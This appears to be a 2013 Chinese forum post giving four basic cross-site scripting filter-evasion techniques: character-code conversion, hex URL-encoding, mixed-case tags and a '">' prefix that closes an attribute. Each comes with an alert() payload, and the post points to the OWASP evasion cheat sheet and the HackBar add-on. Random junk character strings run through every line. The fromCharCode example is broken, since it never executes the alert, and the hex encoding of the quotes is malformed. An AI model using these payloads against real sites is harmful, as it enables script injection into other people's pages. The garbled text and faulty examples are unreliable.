四种超级基础的绕过方法。- a$ _! Q/ M8 r7 S/ \/ ?9 e- e, y
1.转换为ASCII码
8 Z: y# b T4 V, i- ~: L$ |6 R! J/ t例子:原脚本为<script>alert(‘I love F4ck’)</script >/ Z/ O+ f w8 S' ]5 f# P
通过转换,变成:
$ V( f1 L; t# l& ~" V<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>, i" H, T0 b9 P/ X
+ I B: A( d9 U$ `6 G) W3 k2.转换为HEX(十六进制)# J2 Z: S# k8 w1 q3 S e1 S
例子:原脚本为<script>alert(‘I love F4ck’)</script>& b7 V6 N! F+ D, x5 [
通过转换,变成:: l: ?( O- o) n' [# }# [
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
5 x. M* x/ K* D" s9 @
7 M8 p& Y |$ ^6 F: T3.转换脚本的大小写% @" V, L g s8 j
例子:原脚本为<script>alert(‘I love F4ck’)</script>
1 k) i( _$ f$ g# F' ~3 w转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
1 w6 O; c+ U) f. Y ^) v0 f G$ s2 l. S' C* `8 p7 p& G7 y6 e6 q
4.增加闭合标记”>
3 y& S* e& N- w/ e6 ]0 t& N! @- o例子:原脚本为<script>alert(‘I love F4ck’)</script>
! }4 h4 H( Y* E0 F, _( v* y转换为:”><script>alert(‘I love F4ck’)</script>4 b: s1 i) `8 |2 k
更详细绕过技术请参考此网页
# H# i7 {) p# q5 S A9 h# w3 i; ehttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
9 }; @! v- |0 a) v" J& `1 S
* @, b5 X. _: Y |% q8 d转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对